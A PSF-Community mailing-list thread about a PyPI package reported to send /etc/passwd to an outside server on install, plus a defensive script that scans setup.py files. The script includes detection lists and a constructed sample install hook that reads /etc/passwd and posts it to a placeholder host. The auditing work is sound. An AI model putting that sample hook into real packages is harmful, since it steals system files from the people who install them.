> On May 4, 2017, at 4:41 PM, Bruno Rocha <rochacbr...@gmail.com> wrote:
> Hi,
> I just read this on reddit[0], a thread asking if PyPI packages are audited,
> and somebody pointed to `python-nation`[1], which is a harmful and useless
> module that installs itself and sends the `/etc/passwd` content to an external
> endpoint.
> The app receiving the data is hosted at http://python-nation.herokuapp.com
> and as the PSF mission [2] says
> The mission of the Python Software Foundation is to promote, protect, and 
> advance the Python programming language
> I wonder if there is some workgroup at the PSF to handle this? And not only the
> specific case of `python-nation`, which should be deleted and the user maybe
> banned, but also the audit of other packages?
> [0] https://www.reddit.com/r/Python/comments/697da2/does_pypi_review_code_thats_uploaded/
> [1] https://www.reddit.com/r/Python/comments/697da2/does_pypi_review_code_thats_uploaded/dh4uyf8/
> [2] https://www.python.org/psf/mission/

Specifically re: the vector of running code at install time, wheels can help 
with this, though I don't think there is a good way to tell pip to ignore 
non-wheel builds. But even then, the whole point is that you're downloading 
code from the internet :) If you want to discuss this further, I recommend the 
distutils-sig mailing list.

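The reply above turns on one mechanism: installing an sdist runs the packager's `setup.py` (including any `cmdclass` override of `install`), while a wheel is only unpacked. The following is an added example, not code from this thread, from pip or from the `python-nation` package; it shows a heuristic static audit of a `setup.py` for the kind of install-time behaviour the original post describes (reading a sensitive file and posting it to a remote endpoint), plus the sdist-versus-wheel distinction. The two `setup.py` samples are constructed for this example, the endpoint `example.invalid` is a placeholder, and the lists of suspicious modules and calls are assumptions chosen for illustration, not a complete blacklist.

```python
"""Heuristic audit of a setup.py for install-time code execution.

Added example (not code from the thread, pip or PyPI). Assumes the caller has
already unpacked an sdist and holds its setup.py text; the signature lists
below are illustrative assumptions, not an authoritative blacklist.
"""
import ast

# Modules a normal build script has no reason to import (assumed list).
NETWORK_MODULES = {"socket", "urllib", "urllib2", "http", "httplib", "requests"}
# Calls that run arbitrary commands or code at install time (assumed list).
EXEC_CALLS = {"os.system", "subprocess.call", "subprocess.Popen", "subprocess.run",
              "subprocess.check_output", "subprocess.check_call", "eval", "exec"}
# Paths whose presence as a literal in setup.py is a red flag (assumed list).
SENSITIVE_PATHS = ("/etc/passwd", "/etc/shadow", ".ssh/", ".aws/", ".netrc")
# setuptools commands whose subclassing lets packager code run on install.
INSTALL_COMMANDS = {"install", "develop"}


def _dotted_name(node):
    """Return 'a.b.c' for an ast.Name/ast.Attribute chain, else None."""
    parts = []
    while isinstance(node, ast.Attribute):
        parts.append(node.attr)
        node = node.value
    if isinstance(node, ast.Name):
        parts.append(node.id)
        return ".".join(reversed(parts))
    return None


def audit_setup_py(source):
    """Return a sorted list of findings for the given setup.py source text."""
    findings = set()
    for node in ast.walk(ast.parse(source)):
        if isinstance(node, ast.Import):
            for alias in node.names:
                if alias.name.split(".")[0] in NETWORK_MODULES:
                    findings.add("network import: " + alias.name)
        elif isinstance(node, ast.ImportFrom) and node.module:
            if node.module.split(".")[0] in NETWORK_MODULES:
                findings.add("network import: " + node.module)
        elif isinstance(node, ast.Call):
            name = _dotted_name(node.func)
            if name in EXEC_CALLS:
                findings.add("code execution: " + name)
        elif isinstance(node, ast.Constant) and isinstance(node.value, str):
            if node.value.startswith(("http://", "https://")):
                findings.add("remote endpoint: " + node.value)
            for path in SENSITIVE_PATHS:
                if path in node.value:
                    findings.add("sensitive path: " + node.value)
        elif isinstance(node, ast.ClassDef):
            # class Foo(install): def run(self): ... executes at `pip install` of an sdist
            for base in node.bases:
                base_name = _dotted_name(base) or ""
                if base_name.split(".")[-1] in INSTALL_COMMANDS:
                    findings.add("custom install command: " + node.name)
    return sorted(findings)


def install_runs_code(filename):
    """True if pip would execute packager-supplied code while installing this file.

    Wheels (.whl) are unpacked as-is; anything else pip treats as an sdist and
    runs its setup.py, which is the vector discussed in the reply above.
    """
    return not filename.lower().endswith(".whl")


# Constructed sample: an ordinary setup.py with nothing to flag.
BENIGN_SETUP = '''
from setuptools import setup, find_packages
setup(name="example", version="1.0", packages=find_packages())
'''

# Constructed sample mimicking the behaviour described in the thread
# (read /etc/passwd at install time and post it to a remote host).
# The endpoint is a placeholder, not the real one.
SUSPICIOUS_SETUP = '''
from setuptools import setup
from setuptools.command.install import install
import urllib.request

class PostInstall(install):
    def run(self):
        install.run(self)
        data = open("/etc/passwd", "rb").read()
        urllib.request.urlopen("http://example.invalid/collect", data=data)

setup(name="demo-pkg", version="0.1", cmdclass={"install": PostInstall})
'''


if __name__ == "__main__":
    for label, src in (("benign", BENIGN_SETUP), ("suspicious", SUSPICIOUS_SETUP)):
        print(label, audit_setup_py(src) or "no findings")
    for fn in ("demo_pkg-0.1-py3-none-any.whl", "demo_pkg-0.1.tar.gz"):
        print(fn, "runs setup.py" if install_runs_code(fn) else "unpacked only")
```

The audit is a triage aid, not a verdict: a determined author can hide the same behaviour behind string concatenation, `importlib`, or a compiled extension, which is why the reply's point stands that installing from source is executing someone else's code.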

PSF-Community mailing list
